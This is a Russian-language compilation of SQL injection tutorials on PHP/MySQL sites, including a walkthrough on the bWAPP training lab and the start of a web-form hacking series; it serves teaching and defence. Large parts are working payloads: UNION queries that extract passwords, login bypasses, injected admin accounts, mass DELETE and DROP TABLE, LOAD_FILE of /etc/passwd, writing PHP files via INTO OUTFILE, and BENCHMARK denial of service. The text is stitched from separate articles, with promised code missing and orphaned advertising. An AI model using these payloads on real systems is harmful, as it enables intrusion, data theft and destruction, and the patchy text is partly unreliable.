Перевод: Николай Н.
Небрежность и невнимательность, вот две причины написания кода, уязвимого для SQL инъекций. Третья причина - незнание, должна бы побуждать программиста к углублению своих знаний или даже изменения профессии.
SQL инъекция (SQL
injection
) - уязвимость которая
возникает
при недостаточной проверке и обработке
данных
, которые передаются от пользователя, и
позволяет модифицировать и выполнять непредвиденные кодом
программы SQL запросы.
Инъекция SQL является широко распространенным дефектом безопасности в Internet, что легко используется без специальных программ и не требует глубоких технических знаний.
Использование этой уязвимости дает путь к большим возможностям: как то кража, подмена или уничтожение данных, отказ в обслуживании, и т.д.
В этой статье я попробую объяснить основные риски, которые возникают при взаимодействии междуPHP и базой данных MySQL.
Для наглядности приведу пример простой структуры базы данных, которая является типичной для большинства проектов:
CREATE DATABASE
`news`;
USE `news`;
#
# таблица
новостей
#
CREATE TABLE `news` (
`id` int(11) NOT
NULL auto_increment,
`title` varchar(50) default
NULL,
`date` datetime default NULL,
`text`
text,
PRIMARY KEY (`id`)
)
TYPE=MyISAM;
#
#добавляем некоторые
данные
#
INSERT INTO `news` (`id`,`title`,`date`,`text`)
VALUES (1,"first news","2005-06-25
16:50:20","news
text");
INSERT INTO `news` (`id`,`title`,`date`,`text`)
VALUES (2,"second news","2005-06-24
12:12:33","test
news");
#
# таблица пользователей
#
CREATE TABLE
`users` (
`id` int(11) NOT NULL auto_increment,
`login`
varchar(50) default NULL,
`password` varchar(50) default
NULL,
`admin` int(1) NULL DEFAULT "0",
PRIMARY KEY
(`id`)
) TYPE=MyISAM;
#
# добавляем несколько
пользователей, одного с правами админа, другого
простого
#
INSERT INTO `users`
(`id`,`login`,`password`,`admin`) VALUES
(1,"admin","qwerty",1);
INSERT INTO `users`
(`id`,`login`,`password`,`admin`) VALUES
(2,"user","1111",0);
А теперь образец PHP
кода:
Видим, что запрос формируется в зависимости от значения $_GET["id"]. Для проверки наличия уязвимости достаточно изменить его на значение, которое может вызвать ошибку в выполнении SQL запроса.
Конечно, вывода ошибок может и не быть, но это не означает, что ошибки нет.
как результат "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near """ at line 1 "
результат "Unknown column "1qwerty" in "where clause" "
при наличии уязвимости должен выдать результат, аналогичный
Подобные уязвимости позволяют модифицировать запрос в части параметра WHERE.
Первое, что сделает злоумышленник при обнаружении такой уязвимости - исследует, какое количество полей используется в запросе. Для этого задается заведомо неверный id, чтобы исключить вывод реальной информации и объединяется с запросом с одинаковым количеством пустых полей.
количество "null" должно соответствовать количеству полей, которые используются в запросе.
Если запрос выдает ошибку, добавляется еще одно пустое значение, до тех пор пока не исчезнет ошибка и не будет получен результат с пустыми данными. Далее объединенные поля заменяются на значения, которые можно визуально наблюдать на странице.
теперь на странице, где должен был быть показан заголовок новости, будет красоваться qwerty.
логин
текущего пользователя базы данных
http://test.com/index.php?id=-1+UNION+SELECT+null,SYSTEM_USER (),null,null
имя используемой базы данных
http://test.com/index.php?id=-1+UNION+SELECT+null,DATABASE (),null,null
Получение данных из других таблиц:
SELECT * FROM `news` WHERE `id`=-1 UNION SELECT
null,`password`,null,null from `users`where
`id`=1
Вот таким нехитрым способом узнают пароль или
хэш пароля админа.
Если же текущий пользователь имеет права доступа к базе "mysql", без малейших проблем злоумышленник получит хэш пароля админа.
Теперь его подбор это просто вопрос времени.
Поиск
Поиск - одно из наиболее уязвимых
мест, поскольку одновременно передается большое количество
параметров запроса. Пример простого запроса, который выполняет
поиск по ключевому слову:
SELECT * FROM
`news` WHERE `title` LIKE "%$search%" OR `text` LIKE
"%$search%"
$search - слово, которое передается с
формы.
Злоумышленник может передать в переменной
$search = "#
теперь запрос
будет выглядеть следующим образом:
SELECT
* FROM `news` WHERE `title` LIKE "%"#%" OR `text` LIKE
"%"#%"
Соответственно вместо результатов поиска по
ключевому слову будут выданы все данные. Это также позволяет
использовать возможность объединения запросов, описанную
выше.
Использование параметра ORDER
Часто можно увидеть, что при введении параметров поиска, или выводе информации дают возможность пользователю сортировать данные по определенным полям. Скажу сразу, что использование данной уязвимости не является слишком опасным, поскольку при попытке объединения запросов вызовет ошибку, однако в паре с уязвимостями в других полях есть опасность закомментирования этого параметра.
параметр ORDER формируется в зависимости от переменной $sort
$search =" /*
$sort
= */
Будет сформирован
следующий запрос:
SELECT * FROM `news`
WHERE `title` LIKE "%"/*%" OR `text` LIKE "%"/*%" ORDER BY
*/ тем самым закомментируется одно из условий и параметр
ORDER
Теперь можно снова объединить запрос, присвоив
$sort=*/ UNION
SELECT....
Как вариант использования уязвимости
этого параметра:
SELECT * FROM `users`
ORDER BY LENGTH(password); Позволит отсортировать
пользователей в зависимости от длины пароля, при условии, что
он сохраняется в "чистом" виде.
Авторизация
Попробуем теперь
рассмотреть варианты SQL инъекций, которые возникают при
авторизации пользователей. Как правило запрос, который
проверяет правильность данных авторизации выглядит следующим
образом:
SELECT * FROM `users` WHERE
`login`="$login" AND `password`="$password";
где
$login и $password это переменные, которые передаются с
формы.
Подобный запрос возвращает данные по пользователю в случае успеха, а в случае неудачи пустой результат.
Соответственно для того, чтобы пройти
авторизацию злоумышленнику достаточно модифицировать запрос
таким образом, чтобы он вернул ненулевой результат. Задается
логин, который соответствует реальному пользователю, а вместо
пароля указывается " OR
"1"="1
Или какое-нибудь истинное условие
(1, "a"="a", 1<>2, 3>2, 1+1, ISNULL(NULL),
2 IN (0,1,2), 2 BETWEEN 1 AND 3)
Соответственно
запрос будет сформирован следующим образом:
SELECT * FROM `users` WHERE `login`="admin" AND
`password`="" OR "1"="1"; что вернет результат, а как
следствие, приведет к несанкционированной авторизации. А если
пароли в базе данных хэшированные? Тогда проверку пароля
просто "отключают", закомментировав все, что идет после
`login`. В форме вместо логина назначается логин реального
пользователя и "#
тем самым
закомментируется проверка пароля.
SELECT * FROM `users` WHERE `login`="admin"#" AND `password`="12345"
как вариант "OR `id`=2#
SELECT * FROM `users` WHERE
`login`="" OR `id`=2#" AND `password`="12345"
Таким
образом можно пройти авторизацию без знания реального логина.
Случай с
SELECT * FROM `users` WHERE
`login`="" OR `admin`=1#" AND
`password`="12345" позволяет пройти авторизацию с
правами админа.
Большой ошибкой является проверка
пароля следующим образом:
SELECT * FROM
`users` WHERE `login`="$login" AND `password`
LIKE
"$password" поскольку в этом случае для любого
логина подойдет пароль %
INSERT & UPDATE
Однако не только SELECT-ы являются уязвимым местом SQL. Не менее уязвимыми могут оказаться INSERT и UPDATE.
Допустим, на сайте
есть возможность регистрации пользователей. Запрос, который
добавляет нового пользователя:
INSERT INTO
`users` (`login`, `password`,`admin`) VALUES
("юзер",
"пароль",0); Уязвимость одного из полей
позволяет модифицировать запрос с необходимыми данными.
В поле login добавляем юзер",
"пароль", 1)#
тем самым добавив пользователя с правами
админа.
INSERT INTO `users` (`login`,
`password`,`admin`) VALUES ("юзер", "пароль", 1)#
,"пароль",0); Допустим, что поле `admin` находится перед
полем `login`, соответственно трюк с заменой данных, которые
идут после поля `login` не проходит. Вспоминаем, что синтаксис
команды INSERT позволяет добавлять не только одну строчку, а
несколько.
Пример уязвимости в поле login:
$login=
юзер", "пароль"),(1,"хакер",
"пароль")#
INSERT INTO `users`
(`admin`,`login`, `password`) VALUES
(0,"юзер",
"пароль"),(1,"хакер",
"пароль")#","пароль");
Таким образом создается 2 записи, одна с правами простого пользователя, другая с желаемыми правами админа.
Подобная ситуация и с UPDATE
Добавление дополнительных полей для
изменения:
$login=",
`password`="", `admin`="1
Тогда подобный
запрос
UPDATE `users` SET `login`="чайник"
WHERE `id`=2;
Модифицируется следующим
образом:
UPDATE `users` SET `login`="",
`password`="", `admin`="1" WHERE `id`=2;
Что
произойдет? Пользователь с ID 2 изменит логин и пароль на
пустые значения и получит права админа.
Или в случае
$login = ", `password`="" WHERE `id` =1#
Логин и пароль админа станут пустыми.
DELETE
тут все просто, никаких данных
получить или изменить не удастся, но удалить лишнее - всегда
пожалуйста.
$id=1 OR
1=1
И запрос
DELETE FROM `news`
WHERE `id`=1 OR 1=1; почистит все записи в таблице.
Вместо 1=1 может быть любое истинное условие, про которое говорилось выше. Может спасти параметр LIMIT, который ограничит количество удаленных строк, но не всегда, его могут просто закомментировать.
DELETE FROM `news` WHERE `id`=1 OR 1=1# LIMIT 1;
Работа с файлами через SQL-инъекции.
Сильно сомневаюсь, что это где-то может пройти, но справедливости ради нужно описать и такие способы. При включенных привилегиях file можно использовать команды LOAD_FILE и OUTFILE.
Про их опасность можно судить из
нижеприведенных запросов:
SELECT * FROM
`news` WHERE `id`=-1 union select
null,LOAD_FILE("/etc/passwd"),null,null;
SELECT * FROM
`news` WHERE `id`=-1 union
select
null,LOAD_FILE("/home/test/www/dbconf.php"),null,null;
Но
на этом все беды еще не заканчиваются.
SELECT * FROM `news` WHERE `id`=-1 union select
null,"",null,null FROM `news` into outfile
"/home/test/www/test.php";
Вот так записываем
файл, который содержит php код. Правда кроме кода, в нем будет
еще несколько записей null но это никаким образом не повлияет
на работоспособность php кода.
Однако есть несколько
условий, благодаря которым эти способы сработают:
Включена привилегия FILE для текущего пользователя базы
данных;
Права на чтение или запись этих файлов для пользователя,
под которым запускается MySQL сервер
абсолютный путь к файлу;
менее важное условие - размер
файла должен быть меньше чем max_allowed_packet, но поскольку
в MySQL 3.23 размер наибольшего пакета
может быть 16 мБ, а
в 4.0.1 и более, размер пакета ограничивается только
количеством доступной памяти, вплоть до теоретического
максимума в 2 Гб это условие как правило всегда
доступно.
Magic quotes
Магические кавычки делают невозможным использование SQL инъекций в строковых переменных, поскольку автоматически экранирует все " та " Которые приходят с $_GET та $_POST.
Но это не касается использования
уязвимостей в целых или дробных параметрах, правда с
поправкой, что нельзя будет использовать ". В этом случае
помогает функция сhar.
SELECT * FROM
`news` WHERE `id`=-1 UNION
SELECT
null,char(116,101,115,116),null,null;
DOS через SQL-инъекцию.
Чуть не забыл
сказать, а знатоки SQL подтвердят, что операция UNION возможна
только в MySQL >=4.0.0. С облегчением вздохнули люди, у
которых проекты на предыдущих версиях:) Но не все так
безопасно, как выглядит на первый взгляд. Логику
злоумышленника иногда сложно проследить. "Не получится
взломать, так хоть
завалю" подумает хацкер, набирая функцию
BENCHMARK для примера запрос
SELECT *
FROM `news` WHERE `id`=BENCHMARK(1000000,MD5(NOW()));
выполнялся у меня от 12 до 15 секунд. Добавив нолик
- 174 секунды. На большее у меня просто не поднялась
рука.
Конечно, на мощных серверах такие вещи будут выполняться намного быстрее, но...BENCHMARK позволяет вкладывать себя один в один.
Вот так:
SELECT * FROM `news` WHERE
`id`=BENCHMARK(1000000,BENCHMARK(1000000,MD5(NOW())));
Или даже вот так
SELECT * FROM
`news`
WHERE
`id`=BENCHMARK(1000000,BENCHMARK(1000000,BENCHMARK(1000000,MD5(NOW()))));
Да и количество нулей ограничено разве что
"добротой" того, кто их набирает.
Я думаюч то даже ОЧЕНЬ мощная машина, не сможет с легкостью проглотить такие запросы.
Итог
На этом все. В этой стстье я
старался максимально охватить варианты уязвимостей, которые
допускают программисты при создании программ с использованием
баз данных MySQL. Однако я более чем уверен, что это
далеко
не полный перечень.
Поэтому важно
запомнить несколько правил:
Не доверяйте НИКАКИМ данным, которые приходят от пользователя.
Речь идет не только
о данных, которые передаются массивами $_GET и $_POST. Не
следует забывать про $_COOKIE и другие части HTTP-заголовков.
Следует помнить про те, что их легко подменить.
Не стоит надеяться на опцию PHP "magic quotes"
Которые наверно больше мешают чем
помогают. Все данные, которые передаются в базу данных должны
быть сведены по типам с полями
базы данных. ($id=(int)$_GET["id"]) или защищены функциями
mysql_escape_string или mysql_real_escape_string.
mysql_real_escape_string не экранирует % и _, поэтому не стоит ее использовать в паре с LIKE.
Не стоит также сильно надеяться на правильно
написанный mod_rewrite. Это только способы для создания
"удобных" УРЛ-ов, но уж никак не способ защиты от
SQL-инъекций.
Отключите вывод информации об ошибках.
Не помагайте нехорошим посетителям.
Даже если ошибка будет выявлена, отсутствие информации о ней
серьезно затруднит ее применение. Помните про разницу между
стадией разработки и рабочим проектом. Вывод
ошибок
и другой детальной информации - ваш союзник на
стадии разработки, и союзник злоумышленника
в
рабочем варианте. Не стоит также прятать их, комментируя в
HTML коде, на 1000-чу посетителей найдется 1, который таки
найдет подобные вещи.
Обрабатывайте ошибки.
Напишите обработку SQL запросов таким
образом, чтобы информация о них сохранялась в каких-нибудь
логах или отсылалась по почте.
Не сохраняйте данные доступа к базе данных в файлах, которые не обрабатываются PHP как код.
Думаю никому не открыл Америки, но по
собственному опыту могу сказать, что подобная практика
достаточно распространена. Как правило это файл с расширением
*.inc
Не создавайте "супер-пользователя" базы данных.
Предоставляйте только права,
необходимые для выполнения конкретных задач.
В поиске стоит ограничить минимальное и максимальное количество символов, являющееся параметрами запроса.
Для честного пользователя вполне
достаточно от 3-х до 60-70 символов, чтобы удовлетворить свои
поисковые интересы, и одновременно вы предупреждаете ситуации,
когда поисковым запросом станет том "Войны и мира".
Всегда проверяйте количество возвращенных записей после запроса
Почти на 90% сайтов, написанных на php встречается такая логическая ошибка, особенно это можно наблюдать, когдаделается запрос на основе полученного ID от пользователя, если руками дать скрипту несуществующий ID - мы увидим достаточно интересные результаты работы некоторых скриптов, вместо того чтобы вернуть 404 программа в лучшем случае ничего не сделает и выведет в браузер чистую страницу.
Безопасного вам SQL-я;)
Все описанное в статье было выполнено в качестве эксперимента на тестовой базе, владельцем которой является автор статьи. Никакие данные других людей не были уничтожены или изменены.
Автор
статьи не несет никакой ответственности за использование
способов, описанных в данной статье, поскольку предполагалось,
что она была написана с целью информирования о уязвимостях
программ, написанных с использованием баз данных
MySql.
SQL-инъекция для новичков
SQL-инъекция - это опасная уязвимость, которая возникает из-за недостаточной фильтрации вводимых пользователем данных, что позволяет модифицировать запросы к базам данных. Результатом эксплуатации SQL-инъекции является получение доступа к данным, к которым в обычных условиях у пользователя не было бы доступа.
Обычно SQLi находят в веб-приложениях. Но на самом деле, SQL-инъекции могут быть подвержены любые программы, использующие разные базы данных (не только MySQL/MariaDB).
В качестве примера, рассмотрим приложение, которое обращается к базе данных со следующим запросом:
SELECT `name`, `status`, `books` FROM `members` WHERE name = "Demo" AND password ="111"
Запрос похож на естественный язык (английский), и его значение довольно просто интерпретировать:
Выбрать (SELECT) поля `name`, `status`, `books` из (FROM) таблицы `members` где (WHERE) значение поля name равно величине Demo (name = "Demo") и (AND) значение поля password равно величине 111 (password ="111").
Этот запрос вызывает обход таблицы, в результате которого делается сравнение с каждой строкой, и если условие name = "Demo" AND password ="111" является для какой-либо строки истиной, то она попадает в результаты. В данном случае, результаты будут только если и введённое имя пользователя, и пароль в точности совпадают с теми, которые хранятся в таблице.
При этом значения «Demo» и «111» приложение получает от пользователя - например, в форме входа на сайт.
Предположим, что вместо Demo пользователь ввёл такую строку:
Demo" --
Тогда запрос к базе данных будет иметь вид:
SELECT `name`, `status`, `books` FROM `members` WHERE name = "Demo" -- " AND password ="111"
Две чёрточки (-- ) - означают комментарий до конца строки, т.е. всё, что за ними, больше не учитывается. Следовательно, из выражения условия «исчезает» часть " AND password ="111"
Поскольку в комментарии осталась закрывающая кавычка, то она также была введена с именем пользователя, чтобы не сломать синтаксис и не вызвать ошибку, в результате, фактически, к базе данных делался следующий запрос:
SELECT `name`, `status`, `books` FROM `members` WHERE name = "Demo"
В нём была нарушена логика работы программы, заложенная разработчиками. Т.е. теперь поиск в таблице производится только по имени. И если имя совпало, то строка попадает в результаты независимо от введённого пароля. Это и есть пример эксплуатации SQL-инъекции. В реальной ситуации, такая ошибка может быть использована на веб-сайте для входа под учётной записью администратора, для которой достаточно знать только имя, а пароль становится ненужным.
Кроме обхода аутентификации, SQL-инъекция используется для извлечения информации из баз данных, вызова отказа в обслуживании (DoS), эксплуатацию других уязвимостей (вроде XSS) и т.п.
Эксплуатации SQL-инъекции
Каждый раз с любым приложением, где бы не эксплуатировалась SQL-инъекция, используются следующие три базовых правила внедрения:
- Балансировка
- Внедрение
- Комментирование
Балансировка заключается в том, что количество открывающих и закрывающих кавычек и скобок должно быть одинаковым, чтобы не вызвать ошибку синтаксиса. При исследовании ошибки нужно определить, используются, и если используются, то какие кавычки и скобки.
Внедрение заключается в дополнении запроса в зависимости от информации, которую мы хотим получить.
Комментирование позволяет отсечь заключительную часть запроса, чтобы она не нарушала синтаксис.
Комментарии в MySQL начинаются с символов:
Т.е. вместо
Demo" --
можно было бы ввести
Обратите внимание, что после двойной черты обязательно нужен пробел, а после # пробел необязателен.
Можно продолжить менять логику запроса, если в качестве имени пользователя вставить:
Demo" OR 1 --
то получится запрос
SELECT `name`, `status`, `books` FROM `members` WHERE name = " Demo" OR 1 -- " AND password ="111"
Уберём закомментированную часть:
SELECT `name`, `status`, `books` FROM `members` WHERE name = " Demo" OR 1
Мы используем логическое ИЛИ (OR). Логическое ИЛИ возвращает true (истину) если хотя бы одно из выражений является истиной. В данном случае второе выражение 1 всегда является истинной. Следовательно, в результаты попадут вообще все записи таблицы. В реальном веб-приложении можно достичь результата, когда будут выведены данные всех пользователей, несмотря на то, что атакующий не знал ни их логины, ни пароли.
В нашем примере после введённого значения Demo мы ставили одинарную кавычку ("), чтобы запрос оставался правильным с точки зрения синтаксиса. Запрос может быть написан по-разному, например, все следующие формы возвращают одинаковый результат.
Для запросов с цифрой:
SELECT * FROM table_name WHERE id=1 SELECT * FROM table_name WHERE id="1" SELECT * FROM table_name WHERE id="1" SELECT * FROM table_name WHERE id=(1) SELECT * FROM table_name WHERE id=("1") SELECT * FROM table_name WHERE id=("1")
Для запросов со строкой:
SELECT * FROM table_name WHERE id="1" SELECT * FROM table_name WHERE id="1" SELECT * FROM table_name WHERE id=("1") SELECT * FROM table_name WHERE id=("1")
В зависимости от того, как составлен запрос, нужно использовать соответствующие символы парные закрывающие символы, чтобы не происходило нарушения синтаксиса. Например, если бы запрос был записан так (в нём вместо одинарных кавычек, используются двойные):
SELECT * FROM `members` WHERE name = "$name" AND password = "$password"
то имя пользователя
не возымело бы действия и не вызвало бы ошибку. Для обозначения конца введённого имени нужно использовать закрывающую двойную кавычку, т.е.:
Для такого запроса (используются одинарные кавычки и круглые скобки):
SELECT * FROM `members` WHERE name = ("$name") AND password = ("$password")
нужно также закрывать круглые скобки, т.е. для эксплуатации SQL-инъекции нужно ввести что-то вроде
Demo") #
Главными признаками наличия SQL-инъекции является вывод ошибки или отсутствие вывода при вводе одинарной или двойной кавычки. Эти символы могут вызвать ошибку и в самом приложении, поэтому чтобы быть уверенным, что вы имеете дело именно с SQL-инъекцией, а не с другой ошибкой, нужно изучить выводимое сообщение.
Стиль ошибок MySQL:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "\"" at line 1
Ошибка в MSSQL ASPX:
Server Error in "/" Application
Ошибка в MSAccess (Apache PHP):
Fatal error: Uncaught exception "com_exception" with message Source: Microsoft JET Database Engine
Ошибка в MSAccesss (IIS ASP):
Microsoft JET Database Engine error "80040e14"
Ошибка в Oracle:
ORA-00933: SQL command not properly ended
Ошибка в ODBC:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
Ошибка в PostgreSQL:
PSQLException: ERROR: unterminated quoted string at or near """ Position: 1 или Query failed: ERROR: syntax error at or near """ at character 56 in /www/site/test.php on line 121.
Ошибка в MS SQL Server:
Microsoft SQL Native Client error %u201880040e14%u2019 Unclosed quotation mark after the character string
Информация об СУБД также используется определения, какие символы или последовательности символов можно использовать в качестве комментариев.
Практический пример простой SQL-инъекции
Для тренировки я буду использовать bWAPP (по ссылке описание и процесс установки).
Выбираем баг «SQL Injection (GET/Search) »/
От нас ожидается ввод названия фильма, введём в поиск «Iron Man»:
Iron Man"
Результат
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "%"" at line 1
Это говорит о том, что одинарные кавычки не фильтруются и что для обрамления введённых строк не используются двойные кавычки.
Iron Man"
Результат
Т.е. ничего не найдено, это говорит о том, что двойные кавычки также не фильтруются (иначе был бы найден фильм по запросу Iron Man). Также это говорит о том, что для обрамления введённых строк используются одинарные кавычки.
Исходя из полученной информации, формируем строку для вывода всех записей таблицы:
Iron Man" OR 1 #
Результат:
Определение количества столбцов таблицы с помощью ORDER BY
Для создания более сложных команд инъекции нужно знать, сколько в таблице столбцов.
ORDER BY задаёт сортировку полученных из таблицы данных. Можно задавать сортировку по имени столбца, а можно по его номеру. Причём, если столбца с таким номером нет, то будет показана ошибка.
Последовательно пробуем следующие строки (AND 0 используется для подавления лишнего вывода):
Iron Man" AND 0 ORDER BY 1 # Iron Man" AND 0 ORDER BY 2 # Iron Man" AND 0 ORDER BY 3 # ……………………… ……………………… ……………………… Iron Man" AND 0 ORDER BY 7 #
Iron Man" AND 0 ORDER BY 8 #
получен следующий результат:
Error: Unknown column "8" in "order clause"
Это означает, что восьмой столбец отсутствует в таблице, т.е. в таблице всего семь столбцов.
Другой способ нахождения количества столбцов - с помощью того же UNION. Лесенкой прибавляем количество столбцов:
Iron Man" AND 0 UNION SELECT 1 # Iron Man" AND 0 UNION SELECT 1,2 # ……………………… ……………………… ……………………… Iron Man" AND 0 UNION SELECT 1,2,3,4,5,6,7 #
Все они будут вызывать одну и туже ошибку:
Ошибка: The used SELECT statements have a different number of columns
Делайте так пока не исчезнет сообщение об ошибке.
Объединение запросов с UNION SELECT
UNION позволяет объединять результаты в один от нескольких выражений SELECT .
Конструируем наш запрос с UNION :
Iron Man" AND 0 UNION SELECT 1,2,3,4,5,6,7 #
Как я сказал, количество полей должно быть в обоих SELECT одинаковое, а вот что в этих полях — не очень важно. Можно, например, прописать просто цифры — и именно они и будут выведены. Можно прописать NULL - тогда вместо поля ничего не будет выведено.
Обратите внимание, что содержимое некоторых полей UNION SELECT 2,3,4,5 выводится на экран. Вместо цифр можно задать функции.
Что писать в SELECT
Есть некоторые функции и переменные, которые можно писать непосредственно в UNION :
| Переменная / Функция | Вывод |
|---|---|
| @@hostname | Текущее имя хоста |
| @@tmpdir | Директория для временных файлов |
| @@datadir | Директория с базами данных |
| @@version | Версия БД |
| @@basedir | Базовая директория |
| user() | Текущий пользователь |
| database() | Текущая база данных |
| version() | Версия |
| schema() | Текущая база данных |
| UUID() | Ключ системного UUID |
| current_user() | Текущий пользователь |
| current_user | Текущий пользователь |
| system_user() | Текущий системный пользователь |
| session_user() | Сессионный пользователь |
| @@GLOBAL.have_symlink | Проверка, включены или отключены симлинки |
| @@GLOBAL.have_ssl | Проверка, имеется SSL или нет |
Ввод для получения имени базы данных:
Iron Man" AND 0 UNION SELECT 1,database(),3,4,5,6,7 #
База данных INFORMATION_SCHEMA
В списке баз данных MySQL / MariaDB всегда присутствует INFORMATION_SCHEMA . Это служебная БД, которая обеспечивает доступ к метаданным баз данных, информации о сервере MySQL. Проще говоря, она содержит информацию о всех других базах данных, которые поддерживает MySQL / MariaDB сервер. Эта информация включает имена баз данных и таблиц.
Например, следующий запрос выведет имена всех баз данных, присутствующих на сервере:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
- SELECT и FROM - уже знакомые элементы языка запросов к базам данных;
- SCHEMA_NAME - имя запрашиваемого столбца;
- INFORMATION_SCHEMA - имя базы данных, к которой делается запрос;
- SCHEMATA - имя таблицы, в которой ищется запрашиваемый столбец.
Получение списка всех баз данных на сервере через SQL-инъекцию
Используя UNION , мы можем сделать запрос к базе данных INFORMATION_SCHEMA . Например, чтобы вывести содержимое поля SCHEMA_NAME (имена присутствующих баз данных на сервере), можно сделать примерно следующий ввод:
Иногда скрипт веб-приложения, подверженный SQL-инъекции, выводит только по одной записи. В нашем примере это не так, но если бы, например, ввод
Iron Man" AND 0 UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SCHEMATA #
выводил только по одной записи, то для того, чтобы посмотреть все таблицы, можно было бы использовать LIMIT . Например, для первой строки:
Iron Man" AND 0 UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1 #
Для второй строки:
Iron Man" AND 0 UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1 #
Для третьей строки:
Iron Man" AND 0 UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1 #
Для четвёртой строки:
Iron Man" AND 0 UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1 #
Можно задействовать более сложный синтаксис с использованием WHERE и функций. Например, следующий ввод приведёт к показу имён таблиц текущей базы данных:
Iron Man" AND 0 UNION SELECT 1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() #
Получив имена таблиц баз данных, можно продолжить далее и получить имена столбцов:
Желаемый запрос:
SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name="tablenamehere"
Где вместо tablenamehere нужно подставлять имя таблицы.
Например, нами получены следующий имена присутствующих в базе данных таблиц:
- heroes
- movies
- users
- visitors
Тогда для получения имён столбцов в таблице blog нужно сформировать запрос
SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name="blog"
Применительно к нашей уязвимости получаем ввод:
Iron Man" AND 0 UNION SELECT 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME="blog" #
Здесь также можно применять LIMIT .
Извлечение данных из таблицы с помощью SQL-инъекции
Теперь, когда мы знаем имя базы данных, имя таблицы и имя поля, мы можем извлечь данные из произвольной колонки. Например, ввод:
Например, следующий ввод для нашей уязвимости означает извлечь содержимое колонки login из таблицы users из текущей БД:
Iron Man" AND 0 UNION SELECT 1,login,3,4,5,6,7 FROM users #
Заключение по первой части
В первой части были рассмотрены азы SQL-инъекции. В последующих частях будут рассмотрены различные виды SQLi и примеры эксплуатации в различных условиях. Если у вас возникли затруднения с пониманием этого материала, то рекомендуется начать с изучением языка запросов к базе данных . Если вопросы остались, то пишите их в комментариях.
Вы уже знаете о факультете информационной безопасности от GeekBrains? Комплексная годовая программа практического обучения с охватом всех основных тем, а также с дополнительными курсами в подарок . По итогам обучения выдаётся свидетельство установленного образца и сертификат . По специальная скидка на любые факультеты и курсы!
Мы желаем вам успехов в его прохождении. Итоги вашего прохождения будут опубликованы позже (следите за новостями в соц. сетях), а также всем прошедшим в дальнейшем будет выслан инвайт для регистрации на сайте.
Ставьте лайки, делитесь с друзьями и коллегами, репостите в соц.сетях.
Все программисты читали или по крайней мере слышали о методах взлома безопасности веб-сайта. Или даже столкнулись с этой проблемой. С другой стороны, бесконечна фантазия тех, кто хочет сломать сайт, поэтому все узкие места должны быть хорошо защищены. Вот почему я хотел бы начать серию коротких статей, где будут представлены основные методы и приемы взлома веб-сайтов.
В первой статье я хотел бы описать и разъяснить некоторые общие методы взлома одного из самых уязвимых частей сайта — форм. Я буду подробно останавливаться на том, как использовать эти методы и как предотвратить атаки, а также расскажу о тестировании безопасности.
SQL инъекции
SQl-инъекция — это такая техника, когда злоумышленник вводит команды SQL в input поле на веб-странице. Этим imput`ом может быть что угодно — текстовое поле в форме, параметры _GET и _POST, cookies и т. д. Этот метод был весьма эффективным до появления фреймворков в мире PHP. Но этот способ взлома может быть по-прежнему опасен, если вы не используете ORM или какие-либо еще расширения для data object. Почему? Из-за способа передачи параметров в SQL запрос.
"Слепые" инъекции
Давайте начнем с классического примера SQL-statement`а, возвращающего пользователя по его логину и хешу от пароля (страница входа)
Пример 1
mysql_query ("SELECT id, login FROM users WHERE login = ? and password = hash(?)");Я подставил вопросительные знаки в выражение из-за различных вариаций этого решения. Первый вариант, на мой взгляд, самый уязвимый:
Пример 1а
Mysql_query("SELECT id, login FROM users WHERE login = "" . $login . "" and password = hash("" . $password . "")");
В этом случае в коде нет проверки на ввод неправильных данных. Значения передаются прямо из формы ввода в SQL запрос. В самом лучшем случае пользователь введет здесь свои логин и пароль. Что случится в худшем случае? Давайте попробуем хакнуть эту форму. Это можно сделать, передав "подготовленные" данные. Попытаемся войти как первый пользователь из базы данных, а в большинстве случаев — это админский аккаунт. Для этого, передадим специальную строку вместо ввода логина:
" OR 1=1; --
Первая кавычка может быть и одинарной, поэтому одной попыткой взлома можно не обойтись. В конце стоят точка с запятой и два дефиса, чтобы всё, что идёт после превратилось в комментарий. В результате будет выполнен следующий SQL запрос:
SELECT id, login FROM users WHERE login = “;” OR 1=1 LIMIT 0,1; - and password = hash(“;Some password”)
Он вернет первого пользователя из базы данных и, возможно, залогинится под ним в приложении. Хорошим ходом будет добавить LIMIT, чтобы входить под каждым отдельным пользователем. Это единственное, что нужно, чтобы пройти по каждому значению.
Более серьезные способы
В предыдущем примере всё не так уж страшно. Возможности в админской панели управления всегда имеют ограничения и потребуется реально много работы, чтобы поломать сайт. А вот атака через SQL инъекции может привести к куда большим повреждениям системы. Задумайтесь, сколько приложений создаются с главной таблицей "users" , и что будет, если злоумышленник введет такой код в незащищённую форму:
My favorite login"; DROP TABLE users; --
Таблица "users" будет удалена. Это одна из причин почаще делать бэкапы баз данных.
_GET параметры
Все параметры, заполненные через форму, передаются на сервер одним из двух методов — GET или POST. Наиболее распространенный параметр, передаваемый через GET — id. Это одно из самых уязвимых мест для атак, при этом неважно, какого вида урл вы используете — ` http://example.com/users/?id=1 `, или ` http://example.com/users/1 `, или ` http://......./.../post /35 `.
Что произойдет, если мы подставим в урл следующий код?
Http://example.com/users/?id=1 AND 1=0 UNION SELECT 1,concat(login,password), 3,4,5,6 FROM users WHERE id =1; --
